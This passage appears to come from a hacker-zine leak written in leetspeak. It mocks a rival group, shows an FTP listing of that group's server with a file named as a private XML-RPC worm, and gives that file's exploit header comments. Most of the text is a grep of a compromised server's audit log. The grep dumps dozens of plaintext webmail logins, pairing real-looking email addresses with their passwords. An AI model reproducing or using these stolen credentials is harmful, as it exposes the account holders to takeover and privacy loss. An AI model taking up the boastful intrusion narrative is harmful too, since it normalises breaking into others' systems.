drwxrwxr-x 27 1585250 1000000 4096 Dec 9 19:22 modules -rwxrwxr-x 1 1585250 1000000 3095 Dec 9 19:22 modules.php -rwxrwxr-x 1 1585250 1000000 178 Dec 9 19:22 robots.txt drwxrwxr-x 2 1585250 1000000 4096 Dec 9 19:22 sql drwxrwxr-x 16 1585250 1000000 4096 Dec 9 19:22 themes -rwxrwxr-x 1 1585250 1000000 179 Dec 9 19:22 ultramode.txt drwxrwxr-x 2 1585250 1000000 4096 Dec 9 19:22 upgrades 226 Transfer complete. ftp> ls chicks 200 PORT command successful. 150 Opening ASCII mode data connection for /corestormdotcom/chicks . total 8024 -rw-rw-r-- 1 1585250 1000000 393532 Dec 9 21:11 1.jpg -rw-rw-r-- 1 1585250 1000000 396014 Dec 9 21:11 2.jpg -rw-rw-r-- 1 1585250 1000000 438116 Dec 9 21:12 3.jpg -rw-rw-r-- 1 1585250 1000000 365869 Dec 9 21:11 4.jpg -rw-rw-r-- 1 1585250 1000000 311166 Dec 9 21:11 5.jpg -rw-rw-r-- 1 1585250 1000000 545608 Dec 9 21:12 6.jpg -rw-rw-r-- 1 1585250 1000000 450395 Dec 9 21:12 7.jpg -rw-rw-r-- 1 1585250 1000000 542301 Dec 9 21:12 8.jpg -rw-rw-r-- 1 1585250 1000000 596270 Dec 9 21:12 9.jpg -rw-rw-r-- 1 1585250 1000000 15775 Dec 9 21:06 candie.jpg 226 Transfer complete. ftp> ls cs 200 PORT command successful. 150 Opening ASCII mode data connection for /corestormdotcom/cs . total 8 -rw-rw-r-- 1 1585250 1000000 2549 Dec 16 23:36 CoreStorm-RPC-worm-PRIV.pl.pl 226 Transfer complete. ftp> # y3z! j4ckp0t b1tch3z, m0r3 0d4y th4n w00w00 + 7350 ftp> ls board 200 PORT command successful. 150 Opening ASCII mode data connection for /corestormdotcom/board . total 1392 -rw-rw-r-- 1 1585250 1000000 4475 Dec 17 01:51 AcidTechTiger.cfg -rw-rw-r-- 1 1585250 1000000 10700 Dec 17 01:51 AcidTechTiger.css drwxrwxr-x 2 1585250 1000000 4096 Dec 17 01:49 admin -rw-rw-r-- 1 1585250 1000000 1289 Dec 17 01:50 agreement.tpl -rw-rw-r-- 1 1585250 1000000 2969 Dec 17 01:50 bbcode.tpl drwxrwxr-x 2 1585250 1000000 4096 Dec 9 04:09 cache -rw-rw-r-- 1 1585250 1000000 6678 Dec 9 04:09 common.php -rw-rw-r-- 1 1585250 1000000 264 Dec 9 04:09 config.php -rw-rw-r-- 1 1585250 1000000 1156 Dec 17 01:50 confirm_body.tpl drwxrwxr-x 2 1585250 1000000 4096 Dec 9 04:09 db drwxrwxr-x 2 1585250 1000000 4096 Dec 9 04:09 docs -rw-rw-r-- 1 1585250 1000000 901 Dec 17 01:50 error_body.tpl -rw-rw-r-- 1 1585250 1000000 810 Dec 9 04:09 extension.inc -rw-rw-r-- 1 1585250 1000000 3643 Dec 9 04:09 faq.php -rw-rw-r-- 1 1585250 1000000 2647 Dec 17 01:50 faq_body.tpl -rw-rw-r-- 1 1585250 1000000 354 Dec 17 01:50 formIE.css -rw-rw-r-- 1 1585250 1000000 8449 Dec 17 01:51 formStyle.js -rw-rw-r-- 1 1585250 1000000 45807 Dec 9 04:09 groupcp.php -rw-rw-r-- 1 1585250 1000000 7186 Dec 17 01:51 groupcp_info_body.tpl -rw-rw-r-- 1 1585250 1000000 2314 Dec 17 01:50 groupcp_pending_info.tpl -rw-rw-r-- 1 1585250 1000000 3630 Dec 17 01:51 groupcp_user_body.tpl drwxrwxr-x 5 1585250 1000000 4096 Dec 17 01:50 images drwxrwxr-x 2 1585250 1000000 4096 Dec 9 04:09 includes -rw-rw-r-- 1 1585250 1000000 14648 Dec 9 04:09 index.php -rw-rw-r-- 1 1585250 1000000 6812 Dec 17 01:51 index_body.tpl -rw-rw-r-- 1 1585250 1000000 434 Dec 17 01:50 jumpbox.tpl drwxrwxr-x 3 1585250 1000000 4096 Dec 9 04:09 language -rw-rw-r-- 1 1585250 1000000 7830 Dec 9 04:09 login.php -rw-rw-r-- 1 1585250 1000000 2146 Dec 17 01:50 login_body.tpl -rw-rw-r-- 1 1585250 1000000 12148 Dec 9 04:09 memberlist.php -rw-rw-r-- 1 1585250 1000000 2927 Dec 17 01:50 memberlist_body.tpl -rw-rw-r-- 1 1585250 1000000 1106 Dec 17 01:50 message_body.tpl -rw-rw-r-- 1 1585250 1000000 38640 Dec 9 04:09 modcp.php -rw-rw-r-- 1 1585250 1000000 3109 Dec 17 01:50 modcp_body.tpl -rw-rw-r-- 1 1585250 1000000 1724 Dec 17 01:50 modcp_move.tpl -rw-rw-r-- 1 1585250 1000000 3788 Dec 17 01:51 modcp_split.tpl -rw-rw-r-- 1 1585250 1000000 2196 Dec 17 01:50 modcp_viewip.tpl -rw-rw-r-- 1 1585250 1000000 47 Feb 17 19:19 modp.php -rw-rw-r-- 1 1585250 1000000 1211 Dec 17 01:50 overall_footer.tpl -rw-rw-r-- 1 1585250 1000000 3823 Dec 17 06:34 overall_header.tpl -rw-rw-r-- 1 1585250 1000000 34903 Dec 9 04:09 posting.php -rw-rw-r-- 1 1585250 1000000 20300 Dec 17 01:51 posting_body.tpl -rw-rw-r-- 1 1585250 1000000 2102 Dec 17 01:50 posting_poll_body.tpl -rw-rw-r-- 1 1585250 1000000 1158 Dec 17 01:50 posting_preview.tpl -rw-rw-r-- 1 1585250 1000000 2306 Dec 17 01:50 posting_smilies.tpl -rw-rw-r-- 1 1585250 1000000 2565 Dec 17 01:50 posting_topic_review.tpl -rw-rw-r-- 1 1585250 1000000 73687 Dec 9 04:09 privmsg.php -rw-rw-r-- 1 1585250 1000000 5338 Dec 17 01:51 privmsgs_body.tpl -rw-rw-r-- 1 1585250 1000000 1138 Dec 17 01:50 privmsgs_popup.tpl -rw-rw-r-- 1 1585250 1000000 1166 Dec 17 01:50 privmsgs_preview.tpl -rw-rw-r-- 1 1585250 1000000 3747 Dec 17 01:51 privmsgs_read_body.tpl -rw-rw-r-- 1 1585250 1000000 3947 Dec 9 04:09 profile.php -rw-rw-r-- 1 1585250 1000000 14661 Dec 17 01:51 profile_add_body.tpl -rw-rw-r-- 1 1585250 1000000 2007 Dec 17 01:50 profile_avatar_gallery.tpl -rw-rw-r-- 1 1585250 1000000 3025 Dec 17 01:50 profile_send_email.tpl -rw-rw-r-- 1 1585250 1000000 1737 Dec 17 01:50 profile_send_pass.tpl -rw-rw-r-- 1 1585250 1000000 3927 Dec 17 01:51 profile_view_body.tpl -rw-rw-r-- 1 1585250 1000000 226 Dec 17 01:50 scripts.js -rw-rw-r-- 1 1585250 1000000 43342 Dec 9 04:09 search.php -rw-rw-r-- 1 1585250 1000000 5133 Dec 17 01:51 search_body.tpl -rw-rw-r-- 1 1585250 1000000 2983 Dec 17 01:50 search_results_posts.tpl -rw-rw-r-- 1 1585250 1000000 2883 Dec 17 01:50 search_results_topics.tpl -rw-rw-r-- 1 1585250 1000000 1873 Dec 17 01:50 search_username.tpl -rw-rw-r-- 1 1585250 1000000 325 Dec 17 01:50 simple_footer.tpl -rw-rw-r-- 1 1585250 1000000 916 Dec 17 01:50 simple_header.tpl drwxrwxr-x 5 1585250 1000000 4096 Dec 17 06:28 templates -rw-rw-r-- 1 1585250 1000000 4388 Dec 17 01:51 theme_info.cfg -rw-rw-r-- 1 1585250 1000000 23154 Dec 9 04:09 viewforum.php -rw-rw-r-- 1 1585250 1000000 5717 Dec 17 01:51 viewforum_body.tpl -rw-rw-r-- 1 1585250 1000000 7233 Dec 9 04:09 viewonline.php -rw-rw-r-- 1 1585250 1000000 2915 Dec 17 01:50 viewonline_body.tpl -rw-rw-r-- 1 1585250 1000000 45235 Dec 9 04:09 viewtopic.php -rw-rw-r-- 1 1585250 1000000 5281 Dec 17 01:51 viewtopic_body.tpl -rw-rw-r-- 1 1585250 1000000 1092 Dec 17 01:50 viewtopic_poll_ballot.tpl -rw-rw-r-- 1 1585250 1000000 1384 Dec 17 01:50 viewtopic_poll_result.tpl -rw-rw-r-- 1 1585250 1000000 340 Dec 17 01:50 xs.cfg 226 Transfer complete. ftp> exit th3r3 w4sn7 m4ny w4r3z bU7 w3 t4k3 th3m 4nyw4y... # cat CoreStorm-RPC-worm-PRIV.pl.pl #!/usr/bin/perl -w #********************************************* #XML-RPC Remote Command Exploit - Worm #You want a b0t n3t well here's the tool #Have fun kids and remember dd0sing is k-spiff #www.corestorm.com AN0THER C0REST0RM PRODUCT1ON #********************************************* #PRIV PRIV PRIV PRIV PRIV PRIV PRIV PRIV #PRIV PRIV PRIV PRIV PRIV PRIV PRIV PRIV #\\StOrM\\- NWO #********************************************* wh4t th3 fuCk th1z 1z n0t th3 SSH 0hd4yz 1 w4nt3d... #!/usr/bin/perl -w # xml-rpc remote command exploit # [ auto-owner ] # # ## # by : rx @corestorm.com # storm @corestorm.com # anthis @corestorm.com # url : http://www.corestorm.com # priv8 : yes # ## ... 3xpl01tz f0r publ1c fuck1ng w3b vulnz 1z all yu0 h4ve? 3y3 l1k3 th3 w0rm t3chn1qu3 [(c) bysin]. d0 n0t 3v3n m3nt10n yu0r sh1tty gr0upz n4m3 1n th3 s4me s3nt4nc3 4z 7350 0r w00w00... furth3rm0r3, wh4tz th3 fuqn p01nt 0f putt1ng 4ll y0ur d0rky m3mb3rz n4m3z and url 1n th3 h34d3r 1ph 1t'z pr1v4t3? 4nsw3r: s0 wh3n y0u g3t 0wn3d by h0no y0u'll b4 f4m0uz l1k3 t4l0n. 25.txt -~-~-~ h4rd3n3d php t34m crumbl3z pt 2 (kunz) t1tl3: h0no 4dv1s0ry 0n h4rd3n3d-php p4tch. ab0ut th3 h0no 0d4y b4qd00r: w3 f0und th1z b4qd00r 0n th3 w3b. 1t w4z 4cc1d3ntly m1zl4b3l3d 4z a s3cur1ty t00l. h0w 1t w0rkz: a stup1d 4dm1n 1nst4llz b4qd00r th1nk1ng h3 1z s3cur1ng h1z syst3m fr0m h4q3rz. 1nst34d th3 h4q3rs uz3 th3 b4qd00r t0 3v3v4t3 pr1vl3dg3z. p0c: (plz n0te, kunz b0x w4z vuln t0 l1k3 3v3ry w3b4pp vuln 1n th3 l4zt 6 y34rz. php-security.org... right) webby:/var/log/httpd# grep 'pass=' audit.log actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=Info@queerbeet-lg.de&pass=homoehe&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=PJT@lmtc-ger.de&pass=lmtcxyz56&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=sebo%40moshpit.de&pass=23Stirb&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=en_US&button=Log+in actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=info@kingparts.de&pass=nino&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=vf@vollfro.de&pass=kleikatiss&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=vf@vollfro.de&pass=kleikatiss&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=vf@vollfro.de&pass=kleikatiss&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=info@kingparts.de&pass=nino&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=fundjquaak@verein-mediacom.de&pass=vegetarisch&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=fundjquaak@verein-mediacom.de&pass=vegetarisch&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=fundjquaak@verein-mediacom.de&pass=vegetarisch&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=info@kingparts.de&pass=nino&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=info@kingparts.de&pass=nino&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=PJT@lmtc-ger.de&pass=lmtcxyz56&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=fundjquaak@verein-mediacom.de&pass=vegetarisch&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=fundjquaak@verein-mediacom.de&pass=vegetarisch&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=fundjquaak@verein-mediacom.de&pass=vegetarisch&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=fundjquaak@verein-mediacom.de&pass=vegetarisch&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=fundjquaak@verein-mediacom.de&pass=vegetarisch&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=fundjquaak@verein-mediacom.de&pass=vegetarisch&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=fundjquaak@verein-mediacom.de&pass=vegetarisch&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=fundjquaak@verein-mediacom.de&pass=vegetarisch&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=fundjquaak@verein-mediacom.de&pass=vegetarisch&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=fundjquaak@verein-mediacom.de&pass=vegetarisch&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=fundjquaak@verein-mediacom.de&pass=vegetarisch&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=fundjquaak@verein-mediacom.de&pass=vegetarisch&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=fundjquaak@verein-mediacom.de&pass=vegetarisch&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=sebo%40moshpit.de&pass=23Stirb&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Log+in actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=sebo%40moshpit.de&pass=23Stirb&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Log+in actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=sebo%40moshpit.de&pass=23Stirb&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=en_US&button=Log+in actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=sebo%40moshpit.de&pass=23Stirb&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Log+in actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=sebo%40moshpit.de&pass=23Stirb&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Log+in actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=kai%40echoes-online.de&pass=H4d3s&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=en_US&button=Log+in actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=kai%40echoes-online.de&pass=H4d3s&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=en_US&button=Log+in actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=Info@queerbeet-lg.de&pass=homoehe&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=harald.wenzel@filoo.de&pass=r12004&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=matthias@vohs.de&pass=porky62&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=fundjquaak@verein-mediacom.de&pass=vegetarisch&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=fundjquaak@verein-mediacom.de&pass=vegetarisch&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=torsten.hainke@societaet-phg.de&pass=PhG1234&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=julian%40echoes-online.de&pass=stuh2s&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=en_US&button=Log+in actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=Info@queerbeet-lg.de&pass=homoehe&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=Info@queerbeet-lg.de&pass=homoehe&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=bruno@weberei-rockt.de&pass=84765&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=office@msmautern.com&pass=mozart&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=office@msmautern.com&pass=mozart&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=info@societaet-phg.de&pass=PhG1234&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=sebo%40moshpit.de&pass=23Stirb&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Log+in actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=sebo%40moshpit.de&pass=23Stirb&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Log+in actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=nachtfalke@radio-justforyou.com&pass=unseradmin&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=info@kingparts.de&pass=nino&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=info@kingparts.de&pass=nino&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=Info@queerbeet-lg.de&pass=homoehe&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=vf@vollfro.de&pass=kleikatiss&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden Horde=1b3ca6d83d2d7b4600e1de577923f8d4&actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php%3FHorde%3D1b3ca6d83d2d7b4600e1de577923f8d4&mailbox=INBOX&imapuser=kadiya%40schattenlan.de&pass=zat22kad&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=en_US&button=Log+in actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=felde@pc-factory.de&pass=oxygen12&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=Info@queerbeet-lg.de&pass=homoehe&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=sebastian.grewing%40filoo.de&pass=kruemel97&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=Sebo%40moshpit.de&pass=23Stirb&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Log+in actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=benjamin%25birkenhake.org&pass=hamlet&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=en_US actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=hanibal@lmtc-ger.de&pass=lmtc55han&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=Sebo%40moshpit.de&pass=23Stirb&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=en_US&button=Log+in 